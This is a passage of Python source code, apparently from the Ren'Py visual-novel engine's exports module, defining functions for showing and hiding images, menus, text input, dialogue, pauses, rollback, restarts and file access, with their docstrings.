if zorder is None and not renpy.config.preserve_zorder:
zorder = 0
sls = scene_lists()
key = tag or name[0]
layer = default_layer(layer, key)
if renpy.config.sticky_positions:
if not at_list and key in sls.at_list[layer]:
at_list = sls.at_list[layer][key]
if not at_list:
tt = renpy.config.tag_transform.get(key, None)
if tt is not None:
if not isinstance(tt, list):
at_list = [ tt ]
else:
at_list = list(tt)
if what is None:
what = name
elif isinstance(what, basestring):
what = tuple(what.split())
if isinstance(what, renpy.display.core.Displayable):
if renpy.config.wrap_shown_transforms and isinstance(what, renpy.display.motion.Transform):
base = img = renpy.display.image.ImageReference(what, style='image_placement')
# Semi-principled, but mimics pre-6.99.6 behavior - if `what` is
# already a transform, do not apply the default transform to it.
default_transform = None
else:
base = img = what
else:
if renpy.config.image_attributes:
new_what = renpy.game.context().images.apply_attributes(layer, key, name)
if new_what is not None:
what = new_what
name = (key,) + new_what[1:]
base = img = renpy.display.image.ImageReference(what, style='image_placement')
if not base.find_target() and renpy.config.missing_show:
result = renpy.config.missing_show(name, what, layer)
if isinstance(result, renpy.display.core.Displayable):
base = img = result
elif result:
return
for i in at_list:
if isinstance(i, renpy.display.motion.Transform):
img = i(child=img)
else:
img = i(img)
# Mark the newly created images unique.
img._unique()
# Update the list of images we have ever seen.
renpy.game.persistent._seen_images[name] = True # @UndefinedVariable
if tag and munge_name:
name = (tag,) + name[1:]
if renpy.config.missing_hide:
renpy.config.missing_hide(name, layer)
sls.add(layer, img, key, zorder, behind, at_list=at_list, name=name, atl=atl, default_transform=default_transform, transient=transient)
def hide(name, layer=None):
"""
:doc: se_images
Hides an image from a layer. The Python equivalent of the hide statement.
`name`
The name of the image to hide. Only the image tag is used, and
any image with the tag is hidden (the precise name does not matter).
`layer`
The layer on which this function operates. If None, uses the default
layer associated with the tag.
"""
if renpy.game.context().init_phase:
raise Exception("Hide may not run while in init phase.")
if not isinstance(name, tuple):
name = tuple(name.split())
sls = scene_lists()
key = name[0]
layer = default_layer(layer, key)
sls.remove(layer, key)
if renpy.config.missing_hide:
renpy.config.missing_hide(name, layer)
def scene(layer='master'):
"""
:doc: se_images
Removes all displayables from `layer`. This is equivalent to the scene
statement, when the scene statement is not given an image to show.
A full scene statement is equivalent to a call to renpy.scene followed by a
call to :func:`renpy.show`. For example::
scene bg beach
is equivalent to::
$ renpy.scene()
$ renpy.show("bg beach")
"""
if layer is None:
layer = 'master'
if renpy.game.context().init_phase:
raise Exception("Scene may not run while in init phase.")
sls = scene_lists()
sls.clear(layer)
if renpy.config.missing_scene:
renpy.config.missing_scene(layer)
def input(prompt, default='', allow=None, exclude='{}', length=None, with_none=None, pixel_width=None): # @ReservedAssignment
"""
:doc: input
Calling this function pops up a window asking the player to enter some
text. It returns the entered text.
`prompt`
A string giving a prompt to display to the player.
`default`
A string giving the initial text that will be edited by the player.
`allow`
If not None, a string giving a list of characters that will
be allowed in the text.
`exclude`
If not None, if a character is present in this string, it is not
allowed in the text.
`length`
If not None, this must be an integer giving the maximum length
of the input string.
`pixel_width`
If not None, the input is limited to being this many pixels wide,
in the font used by the input to display text.
"""
renpy.exports.mode('input')
roll_forward = renpy.exports.roll_forward_info()
if not isinstance(roll_forward, basestring):
roll_forward = None
# use previous data in rollback
if roll_forward is not None:
default = roll_forward
fixed = in_fixed_rollback()
if has_screen("input"):
widget_properties = { }
widget_properties["input"] = dict(default=default, length=length, allow=allow, exclude=exclude, editable=not fixed, pixel_width=pixel_width)
show_screen("input", _transient=True, _widget_properties=widget_properties, prompt=prompt)
else:
renpy.ui.window(style='input_window')
renpy.ui.vbox()
renpy.ui.text(prompt, style='input_prompt')
inputwidget = renpy.ui.input(default, length=length, style='input_text', allow=allow, exclude=exclude)
# disable input in fixed rollback
if fixed:
inputwidget.disable()
renpy.ui.close()
renpy.exports.shown_window()
if not renpy.game.after_rollback:
renpy.loadsave.force_autosave(True)
# use normal "say" click behavior if input can't be changed
if fixed:
renpy.ui.saybehavior()
rv = renpy.ui.interact(mouse='prompt', type="input", roll_forward=roll_forward)
renpy.exports.checkpoint(rv)
if with_none is None:
with_none = renpy.config.implicit_with_none
if with_none:
renpy.game.interface.do_with(None, None)
return rv
# The arguments and keyword arguments for the current menu call.
menu_args = None
menu_kwargs = None
def get_menu_args():
"""
:other:
Returns a tuple giving the arguments (as a tuple) and the keyword arguments
(as a dict) passed to the current menu statement.
"""
if menu_args is None:
return tuple(), dict()
return menu_args, menu_kwargs
def menu(items, set_expr, args=None, kwargs=None, item_arguments=None):
"""
:undocumented:
Displays a menu, and returns to the user the value of the selected
choice. Also handles conditions and the menuset.
"""
global menu_args
global menu_kwargs
args = args or tuple()
kwargs = kwargs or dict()
nvl = kwargs.pop("nvl", False)
if renpy.config.menu_arguments_callback is not None:
args, kwargs = renpy.config.menu_arguments_callback(*args, **kwargs)
if renpy.config.old_substitutions:
def substitute(s):
return s % tag_quoting_dict
else:
def substitute(s):
return s
if item_arguments is None:
item_arguments = [ (tuple(), dict()) ] * len(items)
# Filter the list of items on the set_expr:
if set_expr:
set = renpy.python.py_eval(set_expr) # @ReservedAssignment
new_items = [ ]
new_item_arguments = [ ]
for i, ia in zip(items, item_arguments):
if i[0] not in set:
new_items.append(i)
new_item_arguments.append(ia)
items = new_items
item_arguments = new_item_arguments
else:
set = None # @ReservedAssignment
# Filter the list of items to only include ones for which the
# condition is true.
if renpy.config.menu_actions:
location=renpy.game.context().current
new_items = [ ]
for (label, condition, value), (item_args, item_kwargs) in zip(items, item_arguments):
label = substitute(label)
condition = renpy.python.py_eval(condition)
if (not renpy.config.menu_include_disabled) and (not condition):
continue
if value is not None:
new_items.append((label, renpy.ui.ChoiceReturn(label, value, location, sensitive=condition, args=item_args, kwargs=item_kwargs)))
else:
new_items.append((label, None))
else:
new_items = [ (substitute(label), value)
for label, condition, value in items
if renpy.python.py_eval(condition) ]
# Check to see if there's at least one choice in set of items:
choices = [ value for label, value in new_items if value is not None ]
# If not, bail out.
if not choices:
return None
# Show the menu.
try:
old_menu_args = menu_args
old_menu_kwargs = menu_kwargs
menu_args = args
menu_kwargs = kwargs
if nvl:
rv = renpy.store.nvl_menu(new_items) # @UndefinedVariable
else:
rv = renpy.store.menu(new_items)
finally:
menu_args = old_menu_args
old_menu_kwargs = old_menu_kwargs
# If we have a set, fill it in with the label of the chosen item.
if set is not None and rv is not None:
for label, condition, value in items:
if value == rv:
try:
set.append(label)
except AttributeError:
set.add(label)
return rv
def choice_for_skipping():
"""
:doc: other
Tells Ren'Py that a choice is coming up soon. This currently has
two effects:
* If Ren'Py is skipping, and the Skip After Choices preferences is set
to stop skipping, skipping is terminated.
* An auto-save is triggered.
"""
if renpy.config.skipping and not renpy.game.preferences.skip_after_choices:
renpy.config.skipping = None
if renpy.config.autosave_on_choice and not renpy.game.after_rollback:
renpy.loadsave.force_autosave(True)
def predict_menu():
"""
:undocumented:
Predicts widgets that are used by the menu.
"""
# This only makes sense for non-NVL menus. But when we have
# NVL menus, they're likely to have already been predicted.
#
# An item lets us load imagebuttons as necessary.
if not renpy.config.choice_screen_chosen:
return
items = [ ("Menu Prediction", True, False) ]
predict_screen(
"choice",
items=items,
)
class MenuEntry(tuple):
"""
The object passed into the choice screen.
"""
def display_menu(items,
window_style='menu_window',
interact=True,
with_none=None,
caption_style='menu_caption',
choice_style='menu_choice',
choice_chosen_style='menu_choice_chosen',
choice_button_style='menu_choice_button',
choice_chosen_button_style='menu_choice_chosen_button',
scope={ },
widget_properties=None,
screen="choice",
type="menu", # @ReservedAssignment
predict_only=False,
**kwargs):
"""
:doc: se_menu
:name: renpy.display_menu
:args: (items, interact=True, screen="choice")
This displays a menu to the user. `items` should be a list of 2-item tuples.
In each tuple, the first item is a textual label, and the second item is
the value to be returned if that item is selected. If the value is None,
the first item is used as a menu caption.
This function takes many arguments, of which only a few are documented.
Except for `items`, all arguments should be given as keyword arguments.
`interact`
If false, the menu is displayed, but no interaction is performed.
`screen`
The name of the screen used to display the menu.
"""
if interact:
renpy.exports.mode(type)
choice_for_skipping()
choices = [ ]
for _, val in items:
if isinstance(val, renpy.ui.ChoiceReturn):
val = val.value
if val is None:
continue
choices.append(val)
# Roll forward.
roll_forward = renpy.exports.roll_forward_info()
if roll_forward not in choices:
roll_forward = None
# Auto choosing.
if renpy.config.auto_choice_delay:
renpy.ui.pausebehavior(renpy.config.auto_choice_delay,
random.choice(choices))
# The location
location=renpy.game.context().current
# change behavior for fixed rollback
if in_fixed_rollback() and renpy.config.fix_rollback_without_choice:
renpy.ui.saybehavior()
scope = dict(scope)
menu_args, menu_kwargs = get_menu_args()
screen = menu_kwargs.pop("screen", screen)
scope.update(menu_kwargs)
# Show the menu.
if has_screen(screen):
item_actions = [ ]
if widget_properties is None:
props = { }
else:
props = widget_properties
for (label, value) in items:
if not label:
value = None
if isinstance(value, renpy.ui.ChoiceReturn):
action = value
chosen = action.get_chosen()
item_args = action.args
item_kwargs = action.kwargs
elif value is not None:
action = renpy.ui.ChoiceReturn(label, value, location)
chosen = action.get_chosen()
item_args = ()
item_kwargs = { }
else:
action = None
chosen = False
item_args = ()
item_kwargs = { }
if renpy.config.choice_screen_chosen:
me = MenuEntry((label, action, chosen))
else:
me = MenuEntry((label, action))
me.caption = label
me.action = action
me.chosen = chosen
me.args = item_args
me.kwargs = item_kwargs
item_actions.append(me)
show_screen(
screen,
items=item_actions,
_widget_properties=props,
_transient=True,
_layer=renpy.config.choice_layer,
*menu_args,
**scope)
else:
renpy.ui.window(style=window_style, focus="menu")
renpy.ui.menu(items,
location=renpy.game.context().current,
focus="choices",
default=True,
caption_style=caption_style,
choice_style=choice_style,
choice_chosen_style=choice_chosen_style,
choice_button_style=choice_button_style,
choice_chosen_button_style=choice_chosen_button_style,
**kwargs)
if renpy.config.menu_showed_window:
renpy.exports.shown_window()
# Log the chosen choice.
for label, val in items:
if val is not None:
log("Choice: " + label)
else:
log(label)
log("")
if interact:
rv = renpy.ui.interact(mouse='menu', type=type, roll_forward=roll_forward)
for label, val in items:
if rv == val:
log("User chose: " + label)
break
else:
log("No choice chosen.")
log("")
checkpoint(rv)
if with_none is None:
with_none = renpy.config.implicit_with_none
if with_none:
renpy.game.interface.do_with(None, None)
return rv
return None
class TagQuotingDict(object):
def __getitem__(self, key):
store = renpy.store.__dict__
if key in store:
rv = store[key]
if isinstance(rv, (str, unicode)):
rv = rv.replace("{", "{{")
return rv
else:
if renpy.config.debug:
raise Exception("During an interpolation, '%s' was not found as a variable." % key)
return "<" + key + " unbound>"
tag_quoting_dict = TagQuotingDict()
def predict_say(who, what):
"""
:undocumented:
This is called to predict the results of a say command.
"""
if who is None:
who = renpy.store.narrator # E1101 @UndefinedVariable
if isinstance(who, (str, unicode)):
return renpy.store.predict_say(who, what)
predict = getattr(who, 'predict', None)
if predict:
predict(what)
def scry_say(who, scry):
"""
:undocumented:
Called when scry is called on a say statement. Needs to set
the interacts field.
"""
try:
scry.interacts = who.will_interact()
except:
scry.interacts = True
def say(who, what, *args, **kwargs):
"""
:doc: se_say
The equivalent of the say statement.
`who`
Either the character that will say something, None for the narrator,
or a string giving the character name. In the latter case, the
:func:`say` is used to create the speaking character.
`what`
A string giving the line to say. Percent-substitutions are performed
in this string.
`interact`
If true, Ren'Py waits for player input when displaying the dialogue. If
false, Ren'Py shows the dialogue, but does not perform an interaction.
(This is passed in as a keyword argument.)
This function is rarely necessary, as the following three lines are
equivalent. ::
e "Hello, world."
$ renpy.say(e, "Hello, world.")
$ e("Hello, world.")
"""
if renpy.config.old_substitutions:
# Interpolate variables.
what = what % tag_quoting_dict
if who is None:
who = renpy.store.narrator # E1101 @UndefinedVariable
if renpy.config.say_arguments_callback:
args, kwargs = renpy.config.say_arguments_callback(who, *args, **kwargs)
if isinstance(who, (str, unicode)):
renpy.store.say(who, what, *args, **kwargs)
else:
who(what, *args, **kwargs)
def imagemap(ground, selected, hotspots, unselected=None, overlays=False,
style='imagemap', mouse='imagemap', with_none=None, **properties):
"""
:undocumented: Use screens already.
Displays an imagemap. An image map consists of two images and a
list of hotspots that are defined on that image. When the user
clicks on a hotspot, the value associated with that hotspot is
returned.
@param ground: The name of the file containing the ground
image. The ground image is displayed for areas that are not part
of any hotspots.
@param selected: The name of the file containing the selected
image. This image is displayed in hotspots when the mouse is over
them.
@param hotspots: A list of tuples defining the hotspots in this
image map. Each tuple has the format (x0, y0, x1, y1, result).
(x0, y0) gives the coordinates of the upper-left corner of the
hotspot, (x1, y1) gives the lower-right corner, and result gives
the value returned from this function if the mouse is clicked in
the hotspot.
@param unselected: If provided, then it is the name of a file
containing the image that's used to fill in hotspots that are not
selected as part of any image. If not provided, the ground image
is used instead.
@param overlays: If True, overlays are displayed when this imagemap
is active. If False, the overlays are suppressed.
@param with_none: If True, performs a with None after the input. If None,
takes the value from config.implicit_with_none.
"""
renpy.exports.mode('imagemap')
renpy.ui.imagemap_compat(ground, selected, hotspots, unselected=unselected,
style=style, **properties)
roll_forward = renpy.exports.roll_forward_info()
if roll_forward not in [ result for _x0, _y0, _x1, _y1, result in hotspots]:
roll_forward = None
if in_fixed_rollback() and renpy.config.fix_rollback_without_choice:
renpy.ui.saybehavior()
rv = renpy.ui.interact(suppress_overlay=(not overlays),
type='imagemap',
mouse=mouse,
roll_forward=roll_forward)
renpy.exports.checkpoint(rv)
if with_none is None:
with_none = renpy.config.implicit_with_none
if with_none:
renpy.game.interface.do_with(None, None)
return rv
def pause(delay=None, music=None, with_none=None, hard=False, checkpoint=None):
"""
:doc: other
:args: (delay=None, hard=False)
Causes Ren'Py to pause. Returns true if the user clicked to end the pause,
or false if the pause timed out or was skipped.
`delay`
If given, the number of seconds Ren'Py should pause for.
`hard`
This must be given as a keyword argument. When True, Ren'Py may prevent
the user from clicking to interrupt the pause. If the player enables
skipping, the hard pause will be skipped. There may be other circumstances
where the hard pause ends early or prevents Ren'Py from operating properly,
these will not be treated as bugs.
In general, using hard pauses is rude. When the user clicks to advance
the game, it's an explicit request - the user wishes the game to advance.
To override that request is to assume you understand what the player
wants more than the player does.
Calling renpy.pause guarantees that whatever is on the screen will be
displayed for at least one frame, and hence has been shown to the
player.
tl;dr - Don't use renpy.pause with hard=True.
"""
if checkpoint is None:
if delay is not None:
checkpoint = False
else:
checkpoint = True
if renpy.config.skipping == "fast":
return False
roll_forward = renpy.exports.roll_forward_info()
if roll_forward not in [ True, False ]:
roll_forward = None
renpy.exports.mode('pause')
if music is not None:
newdelay = renpy.audio.music.get_delay(music)
if newdelay is not None:
delay = newdelay
if (delay is not None) and renpy.game.after_rollback and roll_forward is None:
delay = 0
if delay is None:
afm = " "
else:
afm = None
if hard or not renpy.store._dismiss_pause:
renpy.ui.saybehavior(afm=afm, dismiss='dismiss_hard_pause')
else:
renpy.ui.saybehavior(afm=afm)
if delay is not None:
renpy.ui.pausebehavior(delay, False)
rv = renpy.ui.interact(mouse='pause', type='pause', roll_forward=roll_forward)
if checkpoint:
renpy.exports.checkpoint(rv, keep_rollback=True)
if with_none is None:
with_none = renpy.config.implicit_with_none
if with_none:
renpy.game.interface.do_with(None, None)
return rv
def movie_cutscene(filename, delay=None, loops=0, stop_music=True):
"""
:doc: movie_cutscene
This displays a movie cutscene for the specified number of
seconds. The user can click to interrupt the cutscene.
Overlays and Underlays are disabled for the duration of the cutscene.
`filename`
The name of a file containing any movie playable by Ren'Py.
`delay`
The number of seconds to wait before ending the cutscene.
Normally the length of the movie, in seconds. If None, then the
delay is computed from the number of loops (that is, loops + 1) *
the length of the movie. If -1, we wait until the user clicks.
`loops`
The number of extra loops to show, -1 to loop forever.
Returns True if the movie was terminated by the user, or False if the
given delay elapsed uninterrupted.
"""
renpy.exports.mode('movie')
if stop_music:
renpy.audio.audio.set_force_stop("music", True)
movie_start_fullscreen(filename, loops=loops)
renpy.ui.saybehavior()
if delay is None or delay < 0:
renpy.ui.soundstopbehavior("movie")
else:
renpy.ui.pausebehavior(delay, False)
if renpy.game.log.forward:
roll_forward = True
else:
roll_forward = None
rv = renpy.ui.interact(suppress_overlay=True,
roll_forward=roll_forward)
# We don't want to put a checkpoint here, as we can't roll back while
# playing a cutscene.
movie_stop()
if stop_music:
renpy.audio.audio.set_force_stop("music", False)
return rv
def with_statement(trans, always=False, paired=None, clear=True):
"""
:doc: se_with
:name: renpy.with_statement
:args: (trans, always=False)
Causes a transition to occur. This is the Python equivalent of the
with statement.
`trans`
The transition.
`always`
If True, the transition will always occur, even if the user has
disabled transitions.
This function returns true if the user chose to interrupt the transition,
and false otherwise.
"""
if renpy.game.context().init_phase:
raise Exception("With statements may not run while in init phase.")
if renpy.config.skipping:
trans = None
if not (renpy.game.preferences.transitions or always):
trans = None
renpy.exports.mode('with')
if isinstance(paired, dict):
paired = paired.get(None, None)
if (trans is None) and (paired is None):
return
if isinstance(trans, dict):
for k, v in trans.items():
if k is None:
continue
renpy.exports.transition(v, layer=k)
if None not in trans:
return
trans = trans[None]
return renpy.game.interface.do_with(trans, paired, clear=clear)
globals()["with"] = with_statement
def rollback(force=False, checkpoints=1, defer=False, greedy=True, label=None, abnormal=True, current_label=None):
"""
:doc: rollback
:args: (force=False, checkpoints=1, defer=False, greedy=True, label=None, abnormal=True)
Rolls the state of the game back to the last checkpoint.
`force`
If true, the rollback will occur in all circumstances. Otherwise,
the rollback will only occur if rollback is enabled in the store,
context, and config.
`checkpoints`
Ren'Py will roll back through this many calls to renpy.checkpoint. It
will roll back as far as it can, subject to this condition.
`defer`
If true, the call will be deferred until control returns to the main
context.
`greedy`
If true, rollback will finish just after the previous checkpoint.
If false, rollback finish just before the current checkpoint.
`label`
If not None, a label that is called when rollback completes.
`abnormal`
If true, the default, script executed after the transition is run in
an abnormal mode that skips transitions that would have otherwise
occured. Abnormal mode ends when an interaction begins.
"""
if defer and len(renpy.game.contexts) > 1:
renpy.game.contexts[0].defer_rollback = (force, checkpoints)
return
if not force:
if not renpy.store._rollback:
return
if not renpy.game.context().rollback:
return
if not renpy.config.rollback_enabled:
return
renpy.config.skipping = None
renpy.game.log.complete()
renpy.game.log.rollback(checkpoints, greedy=greedy, label=label, force=(force is True), abnormal=abnormal, current_label=current_label)
def toggle_fullscreen():
"""
:undocumented:
Toggles the fullscreen mode.
"""
renpy.game.preferences.fullscreen = not renpy.game.preferences.fullscreen
def toggle_music():
"""
:undocumented:
Does nothing.
"""
@renpy_pure
def has_label(name):
"""
:doc: label
Returns true if `name` is a valid label the program, or false otherwise.
`name`
Should be a string to check for the existence of a label. It can
also be an opaque tuple giving the name of a non-label statement.
"""
return renpy.game.script.has_label(name)
@renpy_pure
def get_all_labels():
"""
:doc: label
Returns the set of all labels defined in the program, including labels
defined for internal use in the libraries.
"""
rv = [ ]
for i in renpy.game.script.namemap.iterkeys():
if isinstance(i, basestring):
rv.append(i)
return renpy.python.RevertableSet(rv)
def take_screenshot(scale=None, background=False):
"""
:doc: loadsave
Causes a screenshot to be taken. This screenshot will be saved as part of
a save game.
"""
if scale is None:
scale = (renpy.config.thumbnail_width, renpy.config.thumbnail_height)
renpy.game.interface.take_screenshot(scale, background=background)
def full_restart(transition=False, label="_invoke_main_menu", target="_main_menu"):
"""
:doc: other
Causes Ren'Py to restart, returning the user to the main menu.
`transition`
If given, the transition to run, or None to not run a transition.
False uses :var:`config.end_game_transition`.
"""
if transition is False:
transition = renpy.config.end_game_transition
raise renpy.game.FullRestartException((transition, label, target))
def utter_restart():
"""
:undocumented: Used in the implementation of shift+R.
Causes an utter restart of Ren'Py. This reloads the script and
re-runs initialization.
"""
raise renpy.game.UtterRestartException()
def reload_script():
"""
:doc: other
Causes Ren'Py to save the game, reload the script, and then load the
save.
"""
s = get_screen("menu")
session.pop("_reload_screen", None)
session.pop("_reload_screen_args", None)
session.pop("_reload_screen_kwargs", None)
if not renpy.store.main_menu:
if s is not None:
session["_reload_screen"] = s.screen_name[0]
session["_reload_screen_args"] = s.scope.get("_args", ())
session["_reload_screen_kwargs"] = s.scope.get("_kwargs", { })
renpy.game.call_in_new_context("_save_reload_game")
else:
if s is not None:
session["_main_menu_screen"] = s.screen_name[0]
session["_main_menu_screen_args"] = s.scope.get("_args", ())
session["_main_menu_screen_kwargs"] = s.scope.get("_kwargs", { })
utter_restart()
def quit(relaunch=False, status=0, save=False): # @ReservedAssignment
"""
:doc: other
This causes Ren'Py to exit entirely.
`relaunch`
If true, Ren'Py will run a second copy of itself before quitting.
`status`
The status code Ren'Py will return to the operating system.
Generally, 0 is success, and positive integers are failure.
`save`
If true, the game is saved in :var:`_quit_slot` before Ren'Py
terminates.
"""
if save and (renpy.store._quit_slot is not None):
renpy.loadsave.save(renpy.store._quit_slot, getattr(renpy.store, "save_name", ""))
if has_label("quit"):
call_in_new_context("quit")
raise renpy.game.QuitException(relaunch=relaunch, status=status)
def jump(label):
"""
:doc: se_jump
Causes the current statement to end, and control to jump to the given
label.
"""
raise renpy.game.JumpException(label)
def jump_out_of_context(label):
"""
:doc: label
Causes control to leave the current context, and then to be
transferred in the parent context to the given label.
"""
raise renpy.game.JumpOutException(label)
def call(label, *args, **kwargs):
"""
:doc: se_call
Causes the current Ren'Py statement to terminate, and a jump to a
`label` to occur. When the jump returns, control will be passed
to the statement following the current statement.
`from_current`
If true, control will return to the current statement, rather than
the statement following the current statement. (This will lead to
the current statement being run twice. This must be passed as a
keyword argument.)
"""
from_current = kwargs.pop("from_current", False)
raise renpy.game.CallException(label, args, kwargs, from_current=from_current)
def return_statement():
"""
:doc: se_call
Causes Ren'Py to return from the current Ren'Py-level call.
"""
jump("_renpy_return")
def screenshot(filename):
"""
:doc: other
Saves a screenshot in `filename`.
Returns True if the screenshot was saved successfully, False if saving
failed for some reason.
"""
return renpy.game.interface.save_screenshot(filename)
@renpy_pure
def version(tuple=False): # @ReservedAssignment
"""
:doc: renpy_version
If `tuple` is false, returns a string containing "Ren'Py ", followed by
the current version of Ren'Py.
If `tuple` is true, returns a tuple giving each component of the
version as an integer.
"""
if tuple:
return renpy.version_tuple
return renpy.version
version_string = renpy.version
version_only = renpy.version_only
version_name = renpy.version_name
version_tuple = renpy.version_tuple
license = "" # @ReservedAssignment
try:
import platform as _platform
platform = "-".join(_platform.platform().split("-")[:2])
except:
if renpy.android:
platform = "Android"
elif renpy.ios:
platform = "iOS"
else:
platform = "Unknown"
def transition(trans, layer=None, always=False, force=False):
"""
:doc: other
:args: (trans, layer=None, always=False)
Sets the transition that will be used during the next interaction.
`layer`
The layer the transition applies to. If None, the transition
applies to the entire scene.
`always`
If false, this respects the transition preference. If true, the
transition is always run.
"""
if isinstance(trans, dict):
for layer, t in trans.items():
transition(t, layer=layer, always=always, force=force)
return
if (not always) and not renpy.game.preferences.transitions:
trans = None
renpy.game.interface.set_transition(trans, layer, force=force)
def get_transition(layer=None):
"""
:doc: other
Gets the transition for `layer`, or the entire scene if
`layer` is None. This returns the transition that is queued up
to run during the next interaction, or None if no such
transition exists.
"""
return renpy.game.interface.transition.get(layer, None)
def clear_game_runtime():
"""
:doc: other
Resets the game runtime counter.
"""
renpy.game.contexts[0].runtime = 0
def get_game_runtime():
"""
:doc: other
Returns the game runtime counter.
The game runtime counter counts the number of seconds that have
elapsed while waiting for user input in the top-level context.
(It does not count time spent in the main or game menus.)
"""
return renpy.game.contexts[0].runtime
@renpy_pure
def loadable(filename):
"""
:doc: file
Returns True if the given filename is loadable, meaning that it
can be loaded from the disk or from inside an archive. Returns
False if this is not the case.
"""
return renpy.loader.loadable(filename)
@renpy_pure
def exists(filename):
"""
:doc: file_rare
Returns true if the given filename can be found in the
searchpath. This only works if a physical file exists on disk. It
won't find the file if it's inside of an archive.
You almost certainly want to use :func:`renpy.loadable` in preference
to this function.
"""
try:
renpy.loader.transfn(filename)
return True
except:
return False
def restart_interaction():
"""
:doc: other
Restarts the current interaction. Among other things, this displays
images added to the scene, re-evaluates screens, and starts any
queued transitions.
This only does anything when called from within an interaction (for
example, from an action). Outside an interaction, this function has
no effect.
"""
try:
renpy.game.interface.restart_interaction = True
except:
pass
def context():
"""
:doc: context
Returns an object that is unique to the current context. The object
is copied when entering a new context, but changes to the copy do
not change the original.
The object is saved and participates in rollback.
"""
return renpy.game.context().info
def context_nesting_level():
"""
:doc: context
Returns the nesting level of the current context. This is 0 for the
outermost context (the context that is saved, loaded, and rolled-back),
and is non-zero in other contexts, such as menu and replay contexts.
"""
return len(renpy.game.contexts) - 1
def music_start(filename, loops=True, fadeout=None, fadein=0):
"""
Deprecated music start function, retained for compatibility. Use
renpy.music.play() or .queue() instead.
"""
renpy.audio.music.play(filename, loop=loops, fadeout=fadeout, fadein=fadein)
def music_stop(fadeout=None):
"""
Deprecated music start function, retained for compatibility. Use
renpy.music.play() or .queue() instead.
"""
renpy.audio.music.stop(fadeout=fadeout)
def get_filename_line():
"""
:doc: debug
Returns a pair giving the filename and line number of the current
statement.
"""
n = renpy.game.script.namemap.get(renpy.game.context().current, None)
if n is None:
return "unknown", 0
else:
return n.filename, n.linenumber
# A file that log logs to.
logfile = None
def log(msg):
"""
:doc: debug
If :var:`config.log` is not set, this does nothing. Otherwise, it opens
the logfile (if not already open), formats the message to :var:`config.log_width`
columns, and prints it to the logfile.
"""
global logfile
if not renpy.config.log:
return
if msg is None:
return
try:
if not logfile:
import codecs
logfile = _file(renpy.config.log, "a")
if not logfile.tell():
logfile.write(codecs.BOM_UTF8)
import textwrap
print(textwrap.fill(msg, renpy.config.log_width).encode("utf-8"), file=logfile)
logfile.flush()
except:
renpy.config.log = None
def force_full_redraw():
"""
:doc: other
Forces the screen to be redrawn in full. Call this after using pygame
to redraw the screen directly.
"""
renpy.game.interface.full_redraw = True
def do_reshow_say(who, what, interact=False, *args, **kwargs):
if who is not None:
who = renpy.python.py_eval(who)
say(who, what, interact=interact, *args, **kwargs)
curried_do_reshow_say = curry(do_reshow_say)
def get_reshow_say(**kwargs):
kw = dict(renpy.store._last_say_kwargs)
kw.update(kwargs)
return curried_do_reshow_say(
renpy.store._last_say_who,
renpy.store._last_say_what,
renpy.store._last_say_args,
**kw)
def reshow_say(**kwargs):
get_reshow_say()(**kwargs)
def current_interact_type():
return getattr(renpy.game.context().info, "_current_interact_type", None)
def last_interact_type():
return getattr(renpy.game.context().info, "_last_interact_type", None)
def dynamic(*vars): # @ReservedAssignment
"""
:doc: other
This can be given one or more variable names as arguments. This makes
the variables dynamically scoped to the current call. The variables will
be reset to their original value when the call returns.
An example call is::
$ renpy.dynamic("x", "y", "z")
"""
renpy.game.context().make_dynamic(vars)
def context_dynamic(*vars): # @ReservedAssignment
"""
:doc: other
This can be given one or more variable names as arguments. This makes
the variables dynamically scoped to the current context. The variables will
be reset to their original value when the call returns.
An example call is::
$ renpy.context_dynamic("x", "y", "z")
"""
renpy.game.context().make_dynamic(vars, context=True)
def seen_label(label):
"""
:doc: label
Returns true if the named label has executed at least once on the current user's
system, and false otherwise. This can be used to unlock scene galleries, for
example.
"""
return label in renpy.game.persistent._seen_ever # @UndefinedVariable
def seen_audio(filename):
"""
:doc: audio
Returns True if the given filename has been played at least once on the current
user's system.
"""
filename = re.sub(r'^<.*?>', '', filename)
return filename in renpy.game.persistent._seen_audio # @UndefinedVariable
def seen_image(name):
"""
:doc: image_func
Returns True if the named image has been seen at least once on the user's
system. An image has been seen if it's been displayed using the show statement,
scene statement, or :func:`renpy.show` function. (Note that there are cases
where the user won't actually see the image, like a show immediately followed by
a hide.)
"""
if not isinstance(name, tuple):
name = tuple(name.split())
return name in renpy.game.persistent._seen_images # @UndefinedVariable
def file(fn): # @ReservedAssignment
"""
:doc: file
Returns a read-only file-like object that accesses the file named `fn`. The file is
accessed using Ren'Py's standard search method, and may reside in an RPA archive.
or as an Android asset.
The object supports a wide subset of the fields and methods found on Python's
standard file object, opened in binary mode. (Basically, all of the methods that
are sensible for a read-only file.)
"""
return renpy.loader.load(fn)
def notl_file(fn): # @ReservedAssignment
"""
:undocumented:
Like file, but doesn't search the translation prefix.
"""
return renpy.loader.load(fn, tl=False)
@renpy_pure
def image_size(im):
"""
:doc: file_rare
Given an image manipulator, loads it and returns a (``width``,
``height``) tuple giving its size.
This reads the image in from disk and decompresses it, without
using the image cache. This can be slow.
"""
# Index the archives, if we haven't already.
renpy.loader.index_archives()
im = renpy.easy.displayable(im)
if not isinstance(im, renpy.display.im.Image):
raise Exception("renpy.image_size expects it's argument to be an image.")
surf = im.load()
return surf.get_size()
def get_at_list(name, layer=None):
"""
:doc: se_images
Returns the list of transforms being applied to the image with tag `name`
on `layer`. Returns an empty list if no transofrms are being applied, or
None if the image is not shown.
If `layer` is None, uses the default layer for the given tag.
"""
if isinstance(name, basestring):
name = tuple(name.split())
tag = name[0]
layer = default_layer(layer, tag)
return renpy.game.context().scene_lists.at_list[layer].get(tag, None)
def show_layer_at(at_list, layer='master', reset=True):
"""
:doc: se_images
:name: renpy.show_layer_at
The Python equivalent of the ``show layer`` `layer` ``at`` `at_list`
statement.
`reset`
If true, the transform state is reset to the start when it is shown.
If false, the transform state is persisted, allowing the new transform
to update that state.
"""
if not isinstance(at_list, list):
at_list = [ at_list ]
renpy.game.context().scene_lists.set_layer_at_list(layer, at_list, reset=reset)
layer_at_list = show_layer_at
def free_memory():
"""
:doc: other
Attempts to free some memory. Useful before running a renpygame-based
minigame.
"""
force_full_redraw()
renpy.display.interface.kill_textures_and_surfaces()
renpy.text.font.free_memory()
@renpy_pure
def easy_displayable(d, none=False):
"""
:undocumented:
"""
if none:
return renpy.easy.displayable(d)
else:
return renpy.easy.displayable_or_none(d)
def quit_event():
"""
:doc: other
Triggers a quit event, as if the player clicked the quit button in the
window chrome.
"""
renpy.game.interface.quit_event()
def iconify():
"""
:doc: other
Iconifies the game.
"""
renpy.game.interface.iconify()
# New context stuff.
